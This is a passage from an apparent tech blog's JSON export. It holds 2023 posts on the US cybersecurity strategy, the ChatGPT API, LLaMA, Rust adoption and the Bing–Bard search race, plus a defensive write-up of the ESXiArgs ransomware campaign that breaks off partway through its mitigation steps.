This is the clearest signal yet that the era of shipping software with known vulnerabilities and hiding behind EULAs is ending.\nThe Core Shift: You Built It, You Own It # The strategy is organized around five pillars, but Pillar 3 — \u0026ldquo;Shape Market Forces to Drive Security and Resilience\u0026rdquo; — is the one that will keep software executives up at night. The key language: the administration wants to \u0026ldquo;shift liability onto those entities that fail to take reasonable precautions to secure their software.\u0026rdquo;\nThis isn\u0026rsquo;t entirely new thinking. The EU\u0026rsquo;s Cyber Resilience Act has been moving in a similar direction. But the US putting this in a top-level strategic document signals that legislation will follow. The question isn\u0026rsquo;t whether software liability laws are coming, but when and how broadly they\u0026rsquo;ll be applied.\nFor those of us in the trenches, this means several things. First, \u0026ldquo;we\u0026rsquo;ll fix it in the next sprint\u0026rdquo; is going to carry legal weight it never had before. Second, software bills of materials (SBOMs) are moving from \u0026ldquo;nice to have\u0026rdquo; to \u0026ldquo;legally required.\u0026rdquo; Third, the security practices you implement today are building (or failing to build) your compliance posture for regulations that are almost certainly coming within the next few years.\nWhat This Means for Open Source # The strategy acknowledges that open-source software requires special consideration, and this is where things get genuinely complicated. The document suggests that liability should fall on the commercial entities that build products using open-source components, not on the volunteer maintainers of those components.\nThat sounds reasonable in theory. In practice, the boundary between \u0026ldquo;commercial use\u0026rdquo; and \u0026ldquo;community contribution\u0026rdquo; is blurry at best. 
A company that maintains an open-source project as part of its business model — think Elastic, HashiCorp, or Red Hat — occupies a grey zone that policy makers will need to define more precisely.\nI\u0026rsquo;m cautiously optimistic about this approach. The Log4j incident in late 2021 showed us what happens when critical infrastructure depends on under-resourced open-source projects. Placing liability on the commercial consumers of open source creates a financial incentive to actually fund and support the projects they depend on. Whether that incentive translates into meaningful investment remains to be seen.\nFor open-source maintainers: this is a good time to make sure your project has clear licensing, contribution guidelines, and — critically — documented security practices. Even if you\u0026rsquo;re not directly liable, being part of a supply chain that\u0026rsquo;s under regulatory scrutiny means more eyeballs on your processes.\nThe SBOM Imperative # If you\u0026rsquo;re not already generating Software Bills of Materials for your projects, start now. The strategy builds on Executive Order 14028 from 2021, which already mandated SBOMs for software sold to the federal government. The new strategy expands this thinking to the broader market.\nTools like Syft, Trivy, and CycloneDX make SBOM generation straightforward. If you\u0026rsquo;re running a CI/CD pipeline (and in 2023, you should be), adding SBOM generation is a half-day task at most. Here\u0026rsquo;s a basic example with Syft in a GitHub Actions workflow:\n- name: Generate SBOM uses: anchore/sbom-action@v0 with: image: myapp:${{ github.sha }} format: cyclonedx-json output-file: sbom.json The harder part isn\u0026rsquo;t generating the SBOM — it\u0026rsquo;s acting on it. 
You need processes for tracking vulnerabilities in your dependency tree, policies for how quickly you patch, and documentation showing you\u0026rsquo;ve taken \u0026ldquo;reasonable precautions.\u0026rdquo; That last phrase is going to be litigated extensively.\nSecure by Design, Not Secure by Afterthought # The strategy repeatedly emphasizes \u0026ldquo;secure by design\u0026rdquo; and \u0026ldquo;secure by default.\u0026rdquo; These aren\u0026rsquo;t new concepts — we\u0026rsquo;ve been talking about shifting security left for a decade. But having them enshrined in national strategy adds institutional weight.\nPractically, this means:\nDefault configurations should be secure. If your application ships with debug mode enabled, default passwords, or permissive CORS policies, that\u0026rsquo;s a liability. Memory-safe languages get a boost. The strategy explicitly mentions reducing memory safety vulnerabilities. If you\u0026rsquo;re starting a new systems project and choosing between C++ and Rust, the regulatory environment just added another point in Rust\u0026rsquo;s column. Vulnerability disclosure programs are becoming mandatory, not optional. If you don\u0026rsquo;t have a way for researchers to report security issues, you\u0026rsquo;re already behind. My Take # I\u0026rsquo;ve lived through enough security incidents to know that voluntary compliance doesn\u0026rsquo;t work at scale. Companies that prioritize security do so because of culture and leadership, not because of guidelines. For everyone else, regulation is the only lever that moves the needle.\nIs there a risk of overreach? Absolutely. Poorly drafted legislation could punish small vendors disproportionately, create compliance theater that doesn\u0026rsquo;t improve actual security, or chill open-source contribution. The details matter enormously, and I hope the eventual legislation benefits from genuine technical input rather than just lobbyist influence.\nBut the direction is right. 
As someone who has spent decades watching organizations treat security as someone else\u0026rsquo;s problem, seeing it elevated to a national strategic priority — with real liability implications — feels overdue. We build the software that runs the world\u0026rsquo;s infrastructure. It\u0026rsquo;s not unreasonable to ask that we take responsibility for securing it.\nStart with the basics: generate SBOMs, automate dependency scanning, document your security practices, and make sure your team understands that \u0026ldquo;secure by default\u0026rdquo; isn\u0026rsquo;t a slogan anymore. It\u0026rsquo;s becoming the law.\nThis post is part of my Security in Practice series, covering the evolving intersection of security, policy, and software development.\n","date":"9 March 2023","externalUrl":null,"permalink":"/posts/230309-us-national-cybersecurity-strategy-2023/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Biden administration’s new cybersecurity strategy shifts liability toward software vendors, and developers need to pay attention.","title":"The US National Cybersecurity Strategy — Software Liability Is Coming","type":"posts"},{"content":"Yesterday, OpenAI flipped the switch on two APIs that are about to reshape how we build software: the ChatGPT API (powered by gpt-3.5-turbo) and the Whisper API for speech-to-text. The pricing? $0.002 per 1K tokens for ChatGPT — that\u0026rsquo;s roughly 10x cheaper than the existing text-davinci-003 model. This comes just months after ChatGPT\u0026rsquo;s explosive growth and the broader industry realization of what ChatGPT meant. If you haven\u0026rsquo;t already started prototyping, you\u0026rsquo;re behind.\nI\u0026rsquo;ve spent the last 24 hours playing with both endpoints, and I can tell you: this is not incremental. 
This is the moment AI integration goes from \u0026ldquo;interesting experiment\u0026rdquo; to \u0026ldquo;obvious default\u0026rdquo; for a huge range of applications.\nThe API That Changes the Economics # Let\u0026rsquo;s talk numbers. At $0.002 per 1K tokens, a typical back-and-forth conversation of around 1,000 tokens costs you a fraction of a cent. For context, the GPT-3 davinci model was $0.02 per 1K tokens. That\u0026rsquo;s a 90% price drop with arguably better conversational quality.\nThe new gpt-3.5-turbo model uses a chat-oriented format — you send a list of messages with roles (system, user, assistant) rather than a single prompt string. This is a smart design choice. It makes conversation history explicit and gives developers cleaner control over the AI\u0026rsquo;s behavior through the system message.\n{ \u0026#34;model\u0026#34;: \u0026#34;gpt-3.5-turbo\u0026#34;, \u0026#34;messages\u0026#34;: [ {\u0026#34;role\u0026#34;: \u0026#34;system\u0026#34;, \u0026#34;content\u0026#34;: \u0026#34;You are a helpful assistant.\u0026#34;}, {\u0026#34;role\u0026#34;: \u0026#34;user\u0026#34;, \u0026#34;content\u0026#34;: \u0026#34;Explain Docker networking in simple terms.\u0026#34;} ] } For those of us who\u0026rsquo;ve been building with the completion API, the migration is straightforward. But the chat format is genuinely better for most real-world use cases. You can set persistent instructions in the system role and maintain context across turns without the clunky prompt engineering gymnastics we\u0026rsquo;ve been doing.\nWhisper: The Quietly Revolutionary Sibling # The Whisper API deserves more attention than it\u0026rsquo;s getting. OpenAI open-sourced the Whisper model last September, and I\u0026rsquo;ve been running it locally for transcription tasks since then. It\u0026rsquo;s excellent — but running it requires a decent GPU and some infrastructure overhead.\nNow you can hit an API endpoint at $0.006 per minute of audio. 
That\u0026rsquo;s absurdly cheap for production-grade speech-to-text. I\u0026rsquo;ve tested it against Google Cloud Speech-to-Text and AWS Transcribe, and Whisper holds its own on accuracy while being significantly simpler to integrate. One endpoint, one file upload, clean JSON back.\nFor teams building anything voice-related — customer support tools, meeting transcription, accessibility features — this just eliminated weeks of infrastructure work. No model hosting, no GPU provisioning, no batching logic. Just an HTTP call.\nWhat I\u0026rsquo;m Already Seeing in the Wild # Within hours of the announcement, my timeline was flooded with prototypes. Chatbots being wired into Slack workspaces. Customer support widgets. Code review assistants. Translation layers. The speed at which developers are moving on this is remarkable, even by modern standards.\nA few patterns are emerging that I think will define the first wave:\nThin wrapper apps: The simplest integration — take an existing product, add a chat interface powered by gpt-3.5-turbo, ship it. We\u0026rsquo;ll see thousands of these. Most won\u0026rsquo;t survive, but some will find genuine product-market fit.\nDomain-specific assistants: This is where the system message shines. You can create a \u0026ldquo;database expert\u0026rdquo; or \u0026ldquo;security auditor\u0026rdquo; persona that stays in character and provides genuinely useful domain advice. Combined with retrieval-augmented generation (stuffing relevant documentation into the context), these can be remarkably effective.\nWorkflow automation: Chaining API calls together — summarize this email, draft a response, extract action items, create tickets. The cost is low enough that you can run multi-step AI pipelines on routine business processes without blowing your budget.\nThe Concerns That Keep Me Grounded # I\u0026rsquo;ve been in this industry long enough to recognize a gold rush when I see one. 
And gold rushes produce both genuine innovation and spectacular flameouts. This reminds me of the energy around GPT-3\u0026rsquo;s initial release — another moment where suddenly accessible AI capabilities changed what developers could build. A few things worry me:\nLatency: The API isn\u0026rsquo;t instant. For real-time applications, you\u0026rsquo;re looking at noticeable delays. Streaming helps (and OpenAI supports it), but it\u0026rsquo;s not the same as a snappy local computation. Think carefully about where in your UX you place AI-generated responses.\nReliability at scale: OpenAI has had availability issues before. If you\u0026rsquo;re building a core product feature on this API, you need to think about fallbacks, caching, and graceful degradation. Don\u0026rsquo;t make your checkout flow dependent on a third-party AI call.\nThe \u0026ldquo;good enough\u0026rdquo; trap: Just because the model can generate plausible text doesn\u0026rsquo;t mean it\u0026rsquo;s correct. I\u0026rsquo;ve already seen people building medical Q\u0026amp;A tools and financial advisors. The liability implications of deploying unvalidated AI responses in high-stakes domains are significant and largely untested.\nMy Take # I\u0026rsquo;ve been building software since the early \u0026rsquo;90s, and I\u0026rsquo;ve seen my share of \u0026ldquo;this changes everything\u0026rdquo; moments. Most of them didn\u0026rsquo;t. But this one has a quality that the others lacked: immediate practical utility at a price point that removes the need for justification.\nYou don\u0026rsquo;t need to convince your CTO to allocate GPU budget. You don\u0026rsquo;t need a machine learning team. You need an API key and a weekend. That accessibility is what makes this genuinely transformative.\nMy advice? Start small. Pick one tedious workflow in your organization — documentation generation, log analysis, test data creation — and build a prototype this week. 
The API is stable enough, cheap enough, and capable enough to deliver real value right now. Just don\u0026rsquo;t forget to validate the outputs. The model is confident, articulate, and occasionally dead wrong.\nThe AI integration wave isn\u0026rsquo;t coming. As of yesterday, it\u0026rsquo;s here.\nThis post is part of my ongoing AI in Development series, tracking how AI tools are reshaping software engineering in real time.\n","date":"2 March 2023","externalUrl":null,"permalink":"/posts/230302-chatgpt-api-opens-floodgates/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases the ChatGPT and Whisper APIs at a fraction of expected cost, and every developer I know is scrambling to integrate.","title":"ChatGPT API Goes Live — And the Floodgates Are Open","type":"posts"},{"content":"Meta dropped a bombshell this week with the release of LLaMA (Large Language Model Meta AI), a collection of foundation language models ranging from 7 billion to 65 billion parameters. The models are being made available to researchers under a non-commercial license, and the implications for the open-source AI ecosystem are enormous. While OpenAI and Google keep their most powerful models behind API paywalls, Meta just handed the research community the keys to a very capable car.\nWhat Makes LLaMA Different # GPT-3 has 175 billion parameters, and there are rumors of much larger models in development at various labs. What makes LLaMA significant is the combination of strong performance at smaller sizes with open access for researchers.\nThe research paper shows that LLaMA-13B outperforms GPT-3 (175B) on most benchmarks despite being over 10x smaller. LLaMA-65B is competitive with Google\u0026rsquo;s PaLM (540B) and Chinchilla (70B). 
The key insight is that training smaller models on more data — LLaMA was trained on 1.4 trillion tokens from publicly available datasets — produces better results than simply scaling up model size.\nThis matters practically because smaller models are dramatically cheaper to run. Inference on a 13-billion-parameter model can be done on a single high-end GPU. A 65-billion-parameter model needs a multi-GPU setup but is still within reach of well-funded research labs and even some individual researchers. Compare that to the infrastructure needed to serve a 175B+ parameter model, and you start to see why the \u0026ldquo;train longer, not bigger\u0026rdquo; approach is so significant.\nThe Open-Source AI Ecosystem # The release comes at a critical moment in the AI landscape. The most capable language models — GPT-3.5/ChatGPT, GPT-4 (if rumors are true), Google\u0026rsquo;s PaLM — are controlled by a handful of companies. Access is mediated through APIs with usage costs, rate limits, and terms of service that can change at any time. Building a business on someone else\u0026rsquo;s API is always risky; building a business on an AI API where the provider might decide your use case violates their acceptable use policy is riskier still.\nOpen-source alternatives have existed — EleutherAI\u0026rsquo;s GPT-NeoX, BigScience\u0026rsquo;s BLOOM — but they\u0026rsquo;ve generally lagged behind commercial models in capability. LLaMA significantly closes that gap. A 65B model that\u0026rsquo;s competitive with the best commercial offerings gives the research community a serious foundation to build on.\nI expect we\u0026rsquo;ll see an explosion of fine-tuned variants within months. Researchers will adapt LLaMA for specific domains — medical, legal, code generation, multilingual tasks — and share those adapted models with the community. 
The compound effect of thousands of researchers building on a strong foundation model could produce specialized capabilities that no single company could develop internally.\nTechnical Deep Dive # For those interested in the architecture: LLaMA uses a standard transformer decoder architecture with several modifications that have become best practices in the field. These include pre-normalization using RMSNorm (from GPT-3), the SwiGLU activation function (from PaLM), and rotary positional embeddings (RoPE). Nothing revolutionary individually, but the combination with careful training choices produces excellent results.\nThe training data is entirely from publicly available sources: CommonCrawl, C4, GitHub, Wikipedia, Books, ArXiv, and Stack Exchange. No proprietary datasets, no data behind login walls. This matters for reproducibility and for understanding the model\u0026rsquo;s biases and limitations.\nWhat particularly impressed me in the paper is the training efficiency analysis. The authors demonstrate that computational budgets are better spent on training data volume than model size, following the \u0026ldquo;Chinchilla scaling laws\u0026rdquo; from DeepMind\u0026rsquo;s research. Practically, this means that organizations with moderate compute budgets can train highly capable models if they invest in good data curation and training infrastructure.\nImplications for Enterprise AI # Even though LLaMA\u0026rsquo;s license restricts commercial use, the ripple effects will reach enterprise environments quickly. Here\u0026rsquo;s how:\nResearch-to-production pipeline: Researchers will develop techniques, fine-tuning approaches, and architectural improvements using LLaMA that can be applied to other models, including commercially licensed ones. The knowledge transfer is enormous.\nCompetitive pressure on pricing: Every capable open model puts downward pressure on API pricing from OpenAI and others. This dynamic will intensify as open-weight models improve. 
If a company can get 80% of GPT-3\u0026rsquo;s capability by running an open model on their own infrastructure, the premium for API access needs to be justified by that remaining 20%.\nOn-premises AI becomes feasible: For organizations that can\u0026rsquo;t send data to external APIs — healthcare, finance, defense, government — running capable models on-premises has been impractical because the best models weren\u0026rsquo;t available. LLaMA changes that calculation for research purposes, and the techniques it validates will inform commercial open models.\nTalent development: Having access to state-of-the-art models means universities and independent researchers can train the next generation of AI engineers on real, capable systems rather than toy examples. This expands the talent pool for everyone.\nThe Access Question # Meta\u0026rsquo;s approach is a middle ground between fully open-source and fully proprietary. The models are available to researchers who apply for access, under a license that prohibits commercial use. This has already generated debate in the community — some argue it should be fully permissive, others think even this level of access is irresponsible given potential misuse.\nI land somewhere in the pragmatic middle. Making powerful AI models available to the research community is essential for safety research, bias detection, and developing alignment techniques. You can\u0026rsquo;t fix problems in systems you can\u0026rsquo;t inspect. At the same time, some guardrails on distribution seem reasonable while the field develops better understanding of misuse risks.\nThe reality is that sufficiently motivated actors already have access to capable language models through various means. Restricting access primarily affects legitimate researchers who play by the rules. 
Meta seems to recognize this — their approach enables research while maintaining some ability to track who\u0026rsquo;s using the models and for what purpose.\nMy Take # This release feels like a turning point. The concentration of AI capabilities in a few commercial entities has been a growing concern, and LLaMA demonstrates that open alternatives can compete at the frontier. The \u0026ldquo;train smaller models on more data\u0026rdquo; insight alone is worth the paper — it means the compute barrier to training capable models is lower than many assumed.\nWhat I\u0026rsquo;m watching for next: how quickly the research community iterates on LLaMA, whether we see fine-tuned variants that match or exceed ChatGPT for specific tasks, and how OpenAI and Google respond to the competitive pressure from below. The AI ecosystem just got a lot more interesting, and honestly, a lot more healthy. Concentration of power in any technology domain is bad for innovation, and LLaMA is a meaningful counterweight.\nIf you\u0026rsquo;re a developer interested in AI, start familiarizing yourself with running and fine-tuning open language models. The tooling around Hugging Face Transformers, PEFT (Parameter-Efficient Fine-Tuning), and related projects is maturing rapidly. The era of \u0026ldquo;AI as someone else\u0026rsquo;s API\u0026rdquo; may be shorter than we thought.\n","date":"23 February 2023","externalUrl":null,"permalink":"/posts/230223-meta-llama-open-source-llm/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta’s release of LLaMA, a family of foundation language models available to researchers, could reshape the AI landscape by democratizing access to powerful LLMs.","title":"Meta Releases LLaMA — Open-Source AI Just Got Serious","type":"posts"},{"content":"Rust 1.67 landed a few weeks ago with refinements to async trait support and improvements to the standard library. On its own, a point release doesn\u0026rsquo;t make headlines. 
But zoom out and the picture is striking: Rust adoption in enterprise environments has been accelerating steadily, and 2023 is shaping up to be the year it moves from \u0026ldquo;interesting alternative\u0026rdquo; to \u0026ldquo;default choice\u0026rdquo; for a significant category of new projects. This continues momentum from the Rust Foundation formation and earlier stabilization milestones.\nThe Adoption Wave # The signals are everywhere. Microsoft has been investing heavily in Rust for Windows kernel components, motivated by the reality that roughly 70% of their CVEs stem from memory safety issues. Google is using Rust in Android, Chrome, and other critical systems. Amazon has built Firecracker — the microVM technology underpinning AWS Lambda — entirely in Rust. The Linux kernel officially started accepting Rust code, a milestone that would have seemed unthinkable five years ago.\nWhat\u0026rsquo;s changed isn\u0026rsquo;t the language itself — Rust has been excellent for years. What\u0026rsquo;s changed is the ecosystem maturity and the organizational willingness to bet on it. The crate ecosystem has hit critical mass for most common tasks. The tooling and language features have been steadily stabilized making real-world development practical. And the hiring market, while still smaller than for languages like Java or Python, has grown enough that staffing Rust teams is feasible.\nWhy Now? The Security Imperative # The strongest driver for enterprise Rust adoption is security, and specifically memory safety. The White House recently highlighted the importance of memory-safe languages as part of national cybersecurity strategy. When government agencies start talking about your programming language choice as a security concern, enterprise risk committees pay attention.\nThe numbers back it up. 
Study after study shows that memory safety vulnerabilities — buffer overflows, use-after-free, null pointer dereferences — account for a majority of serious security bugs in C and C++ codebases. Rust eliminates these entire categories of bugs at compile time. Not \u0026ldquo;reduces\u0026rdquo; — eliminates. For security-critical infrastructure, that\u0026rsquo;s not an incremental improvement; it\u0026rsquo;s a paradigm shift.\nI\u0026rsquo;ve been writing C and C++ for decades, and I\u0026rsquo;m the first to acknowledge that even experienced developers produce memory safety bugs. It\u0026rsquo;s not about skill — it\u0026rsquo;s about the fundamental mismatch between human attention spans and the relentless precision required to manage memory correctly across millions of lines of code over years of maintenance.\nThe Developer Experience Gap # What impresses me most about Rust\u0026rsquo;s trajectory is how the team has addressed the historically steep learning curve without compromising the language\u0026rsquo;s core guarantees. The borrow checker still enforces ownership rules strictly, but the error messages have improved dramatically. The compiler doesn\u0026rsquo;t just tell you what\u0026rsquo;s wrong — it often tells you how to fix it, with suggested code changes.\nRust 1.67\u0026rsquo;s stabilization of #[must_use] on async functions is a good example of the thoughtful evolution. Async Rust has been one of the rougher edges of the language, and each release smooths it further. The upcoming work on async traits through the async-trait crate and eventually native support will address one of the most common pain points new Rust developers encounter.\nThe IDE experience has also reached a tipping point. Rust-analyzer provides autocompletion, inline type hints, and refactoring capabilities that rival what Java developers have enjoyed with IntelliJ for years. 
When I pair with junior developers on Rust projects, the tooling catches mistakes fast enough that the learning curve feels manageable rather than punishing.\nWhere Rust Fits (And Where It Doesn\u0026rsquo;t) # Let me be pragmatic about where Rust makes sense today:\nStrong fit: Systems programming, network services, CLI tools, WebAssembly targets, performance-critical backend services, embedded systems, security-sensitive components. If you\u0026rsquo;re writing something that needs to be fast, correct, and reliable — Rust is probably your best option.\nGrowing fit: Web backend services (frameworks like Actix and Axum are maturing rapidly), cloud infrastructure tooling, data processing pipelines. The ecosystem isn\u0026rsquo;t as rich as Go or Java for these use cases, but it\u0026rsquo;s closing the gap.\nNot yet ideal: Rapid prototyping, data science and ML (Python\u0026rsquo;s ecosystem is still vastly superior), GUI applications (the story is improving but fragmented), anything where development speed matters more than runtime performance.\nThe key insight is that Rust isn\u0026rsquo;t trying to replace everything. It\u0026rsquo;s capturing the space where C and C++ have been the reluctant defaults — where you need performance and correctness but historically had to accept the risk of memory safety bugs as the cost of doing business.\nThe Hiring Challenge # The biggest practical barrier to Rust adoption remains talent availability. Most organizations can\u0026rsquo;t staff a Rust team as easily as a Java or Python team. But this is changing faster than many hiring managers realize.\nThe Rust community has been remarkably effective at creating learning resources. The official Rust Book is one of the best programming language introductions I\u0026rsquo;ve read. Programs like \u0026ldquo;Rustlings\u0026rdquo; provide hands-on exercises. 
And the community\u0026rsquo;s culture of helpfulness — particularly on the official forums and Discord — makes the onboarding experience for new Rust developers genuinely welcoming.\nI\u0026rsquo;ve seen several teams successfully transition experienced C++ or Java developers to productive Rust contributors within three to four months. The initial learning curve is real, but once developers internalize ownership concepts, their productivity often exceeds what it was in their previous language, because the compiler catches entire categories of bugs that would otherwise surface as runtime failures.\nMy Take # I started paying serious attention to Rust around 2018, and I\u0026rsquo;ll admit I was skeptical about enterprise adoption timelines. The language was clearly superior technically, but \u0026ldquo;technically superior\u0026rdquo; doesn\u0026rsquo;t always win in enterprise environments where ecosystem, tooling, and hiring matter as much as language design.\nWhat I underestimated was the security imperative. When the cost of memory safety bugs is measured in billions of dollars and national security implications, the calculus changes. Rust went from \u0026ldquo;nice to have\u0026rdquo; to \u0026ldquo;strategic necessity\u0026rdquo; faster than I expected.\nIf you\u0026rsquo;re a developer who hasn\u0026rsquo;t spent time with Rust yet, 2023 is the year to start. Not because it will replace your primary language overnight, but because understanding ownership-based memory management and Rust\u0026rsquo;s approach to correctness will make you a better programmer in any language. And if your organization is evaluating Rust for new projects — the ecosystem is ready. 
The question isn\u0026rsquo;t whether to adopt Rust anymore; it\u0026rsquo;s which projects to start with.\n","date":"16 February 2023","externalUrl":null,"permalink":"/posts/230216-rust-enterprise-adoption-momentum/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With Rust 1.67 freshly shipped and adoption accelerating across major tech companies, the language is crossing the threshold from promising to essential.","title":"Rust's Enterprise Momentum — From Systems Language to Industry Standard","type":"posts"},{"content":"What a week. On Tuesday, Microsoft unveiled the new AI-powered Bing, featuring deep integration with an upgraded version of ChatGPT. The very next day, Google fired back with the announcement of Bard, their conversational AI service powered by a lightweight version of LaMDA. The AI arms race has officially moved from research labs to the products billions of people use every day.\nMicrosoft Fires First # The new Bing integrates a large language model directly into the search experience. You can ask complex questions in natural language and get synthesized, conversational answers with citations. It\u0026rsquo;s not just a chatbot bolted onto the side — Microsoft has reworked the search results page to blend traditional web results with AI-generated summaries.\nI got access to the preview today, and my first impression is that it\u0026rsquo;s genuinely useful for certain query types. Asking \u0026ldquo;explain the differences between gRPC and REST for microservice communication\u0026rdquo; returns a well-structured comparison that would normally require reading three or four articles. The citations let you verify the claims, which is crucial — because the model does occasionally get things wrong. The accuracy challenges inherent in generative AI apply equally to search integration.\nThe technical architecture is interesting. 
Microsoft describes it as a \u0026ldquo;Prometheus model\u0026rdquo; — essentially a fine-tuned version of GPT-4 (they\u0026rsquo;re being cagey about the exact model) with Bing\u0026rsquo;s search index integrated into the inference pipeline. The model can query the web in real-time to ground its responses in current information, which addresses one of the biggest limitations of standalone ChatGPT: its knowledge cutoff date.\nGoogle\u0026rsquo;s Response — Fast But Stumbling # Google\u0026rsquo;s Bard announcement felt rushed, and the market agreed — Alphabet\u0026rsquo;s stock dropped significantly after the reveal. The demo showed Bard giving an incorrect answer about the James Webb Space Telescope, claiming it took the first pictures of an exoplanet outside our solar system. It didn\u0026rsquo;t. That error, visible in Google\u0026rsquo;s own promotional material, undermined confidence in a product that needs to be trustworthy above all else.\nBut let\u0026rsquo;s not overreact to a demo gaffe. Google has been doing serious AI research for years. They published the original \u0026ldquo;Attention Is All You Need\u0026rdquo; transformer paper. They built BERT, which revolutionized search understanding. Google has LaMDA and other capable models that power research initiatives. The talent and technology are there — the question is whether they can ship products as aggressively as Microsoft right now.\nThe challenge for Google is existential in a way it isn\u0026rsquo;t for Microsoft. Search advertising represents the vast majority of Google\u0026rsquo;s revenue. Every AI-generated answer that satisfies a user\u0026rsquo;s query without them clicking through to a website is potentially a lost ad impression. 
Microsoft, with Bing\u0026rsquo;s tiny market share, has little to lose and everything to gain.\nImplications for Developers # For those of us building applications, this AI search shift has significant practical implications that go beyond just how we find Stack Overflow answers.\nSEO and content strategy changes: If search engines start answering queries directly via AI summaries, the traffic patterns to documentation sites, blogs, and technical resources will shift. This represents a fundamental shift in how content gets discovered and valued. API documentation, tutorials, and technical guides need to be structured in ways that AI models can accurately extract and cite. Structured data and clear, authoritative content become even more important.\nNew API opportunities: Both Microsoft and Google will likely offer API access to their AI-enhanced search capabilities. Imagine building applications that can query the web conversationally — customer support tools that pull current product information, research assistants that synthesize recent publications, monitoring systems that understand natural language alerts in context.\nAccuracy and trust challenges: The Bard demo error illustrates a fundamental problem. These models generate plausible-sounding text that may be factually wrong. Any application that integrates AI-generated search results needs robust verification mechanisms. We can\u0026rsquo;t just pipe model output directly to users and call it a day.\nThe Bigger Picture # What excites me most about this week isn\u0026rsquo;t either product specifically — it\u0026rsquo;s the competitive pressure. For years, search has been effectively a monopoly. Google had no serious incentive to fundamentally reinvent the experience because there was no credible threat. 
Microsoft just became a credible threat, and Google is responding with urgency we haven\u0026rsquo;t seen from them in the search space in over a decade.\nCompetition drives innovation, and we\u0026rsquo;re about to see a lot of innovation very quickly. Both companies will be shipping features at a pace driven by fear of falling behind rather than cautious product planning. This means faster iteration, more experimental features reaching users, and inevitably some spectacular failures along the way.\nThe infrastructure implications are also enormous. Serving AI-generated responses for search queries at Google and Bing\u0026rsquo;s scale requires massive GPU inference capacity. The cost per query goes up substantially compared to traditional search. Both companies will need to figure out how to make the economics work, which will drive innovations in model efficiency, hardware optimization, and inference architecture.\nMy Take # I\u0026rsquo;ve been using search engines since AltaVista, and this feels like the most significant shift in how search works since Google introduced PageRank. The conversational interface isn\u0026rsquo;t just a new UI skin — it changes what kinds of questions you can ask and what kinds of answers you get.\nThat said, I\u0026rsquo;m maintaining healthy skepticism. The current models hallucinate. They present wrong information with the same confidence as correct information. For technical work — debugging code, understanding API behavior, diagnosing infrastructure issues — I still want to see the primary sources. An AI summary that\u0026rsquo;s 95% accurate but wrong about one critical detail can cost you hours of debugging.\nMy prediction: within six months, AI-enhanced search will be the default experience for both Bing and Google, the accuracy will improve meaningfully, and we\u0026rsquo;ll all wonder how we tolerated the old \u0026ldquo;ten blue links\u0026rdquo; format for so long. 
But the journey there is going to be messy, entertaining, and occasionally infuriating.\nGrab some popcorn. The search wars are back.\n","date":"9 February 2023","externalUrl":null,"permalink":"/posts/230209-ai-search-wars-bing-bard/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft and Google are racing to integrate large language models into search, and the implications go far beyond just finding web pages.","title":"The AI Search Wars Begin — Bing Chat, Google Bard, and the Future of Finding Things","type":"posts"},{"content":"Reports are flooding in this week about a large-scale ransomware campaign targeting VMware ESXi hypervisors. Dubbed \u0026ldquo;ESXiArgs\u0026rdquo; by researchers, the attack exploits CVE-2021-21974 — a heap overflow vulnerability in the OpenSLP service that VMware patched nearly two years ago. Thousands of servers worldwide have already been hit, with CERT-FR among the first to issue warnings. The scale is staggering, and the root cause is depressingly familiar.\nThe Vulnerability That Wouldn\u0026rsquo;t Die # CVE-2021-21974 affects ESXi versions 6.5, 6.7, and 7.0 where the OpenSLP service is enabled and accessible on port 427. VMware released patches in February 2021. That\u0026rsquo;s two full years of patch availability, and yet Shodan scans reveal thousands of internet-facing ESXi instances still running vulnerable configurations.\nI wish I could say this surprises me, but after three decades in this industry, the pattern is achingly predictable. Hypervisors occupy an awkward position in many organizations\u0026rsquo; patch management strategies. They\u0026rsquo;re \u0026ldquo;infrastructure\u0026rdquo; — not application servers that get regular update cycles, and not network equipment managed by a separate team. 
They sit in a gap where responsibility is ambiguous, and patching requires VM migration or downtime that nobody wants to schedule.\nThe attack vector is particularly nasty because it targets the hypervisor layer directly. Once an attacker compromises ESXi, they can encrypt the virtual disk files (.vmdk), swap files, and configuration files of every VM running on that host. One compromised hypervisor can take down dozens of production workloads simultaneously.\nAnatomy of the Attack # The ESXiArgs ransomware follows a relatively straightforward attack chain. The attacker exploits the SLP vulnerability to gain code execution on the ESXi host, then deploys an encryption routine that targets specific file extensions associated with virtual machines. The ransom note demands Bitcoin payment — typically around 2 BTC — with a unique wallet address per victim.\nWhat\u0026rsquo;s notable about this campaign is its automation. The attackers aren\u0026rsquo;t carefully selecting targets or moving laterally through networks. They\u0026rsquo;re scanning the internet for exposed SLP services on port 427 and firing the exploit at anything that responds. It\u0026rsquo;s industrialized exploitation at scale.\nThe encryption implementation has some interesting characteristics. Early analysis suggests it encrypts small files completely but only encrypts portions of larger files — specifically the beginning and end sections with a configurable chunk size. This means that in some cases, partial data recovery might be possible from the unencrypted middle sections of large VMDK files. Several community members are already working on recovery scripts, though success depends heavily on the specific encryption parameters used.\nWhy This Keeps Happening # The uncomfortable truth is that this incident exposes systemic failures in how organizations manage infrastructure security. Let me count the ways:\nPatch management gaps: Two years is an eternity in security terms. 
If your hypervisors haven\u0026rsquo;t been patched in two years, what else hasn\u0026rsquo;t been patched? The problem often stems from treating hypervisors as \u0026ldquo;set and forget\u0026rdquo; infrastructure rather than actively managed systems.\nUnnecessary exposure: There is almost no legitimate reason for ESXi\u0026rsquo;s SLP service to be accessible from the internet. Proper network segmentation would have prevented this attack entirely, regardless of patch status. Management interfaces for hypervisors should never be internet-facing — full stop.\nMonitoring blind spots: Many organizations have robust monitoring for their VMs but minimal visibility into what\u0026rsquo;s happening at the hypervisor level. ESXi hosts often don\u0026rsquo;t run endpoint detection agents, and their logs may not feed into the central SIEM.\nBackup architecture: If your backups live on datastores connected to the same ESXi host, they\u0026rsquo;re encrypted too. The 3-2-1 backup rule exists for exactly this scenario — three copies, two different media types, one offsite.\nPractical Response Steps # If you\u0026rsquo;re running VMware ESXi in your environment, here\u0026rsquo;s what I\u0026rsquo;d recommend doing this week:\nFirst, audit your ESXi inventory. Know exactly which versions you\u0026rsquo;re running and their patch levels. If you have any instances exposed to the internet, isolate them immediately — before patching, before anything else.\nSecond, disable the SLP service if you\u0026rsquo;re not using it. On ESXi, you can do this via the command line:\n/etc/init.d/slpd stop\nesxcli network 